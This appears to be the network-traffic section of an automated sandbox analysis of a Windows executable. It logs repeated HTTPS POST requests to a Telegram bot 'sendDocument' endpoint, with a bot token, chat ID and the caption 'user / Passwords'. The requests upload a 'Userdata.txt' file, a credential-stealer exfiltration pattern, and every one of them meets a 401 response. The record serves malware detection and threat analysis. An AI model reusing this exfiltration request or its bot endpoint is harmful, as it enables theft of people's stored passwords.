                                                                                                          2025-01-11 02:06:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 61 37 38 32 37 32 30 34 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd34a782720438Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:31 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:31 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:31 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.1049750149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:33 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd34d1471b6fa1
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 64 31 34 37 31 62 36 66 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd34d1471b6fa1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:33 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:33 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:33 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.1049752149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:34 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd34f9a68ce3e0
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 66 39 61 36 38 63 65 33 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd34f9a68ce3e0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:35 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:35 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:35 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.1049754149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:36 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3526ec8c239e
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 32 36 65 63 38 63 32 33 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3526ec8c239eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:36 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:36 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:36 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.1049756149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:38 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd357d60fe315a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 37 64 36 30 66 65 33 31 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd357d60fe315aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:39 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:38 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:39 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.1049758149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:40 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd35b450780516
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 62 34 35 30 37 38 30 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd35b450780516Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:40 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:40 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:40 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.1049760149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:42 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd35f180510c0b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 66 31 38 30 35 31 30 63 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd35f180510c0bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:42 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:42 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:42 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.1049762149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:43 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3633a7f99f46
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 33 33 61 37 66 39 39 66 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3633a7f99f46Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:44 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:44 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:44 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.1049764149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:46 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd369e576146ce
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 39 65 35 37 36 31 34 36 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd369e576146ceContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:46 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:46 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:46 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.1049766149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:48 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd36efca5c9cba
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 65 66 63 61 35 63 39 63 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd36efca5c9cbaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:48 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:48 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:48 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.1049768149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
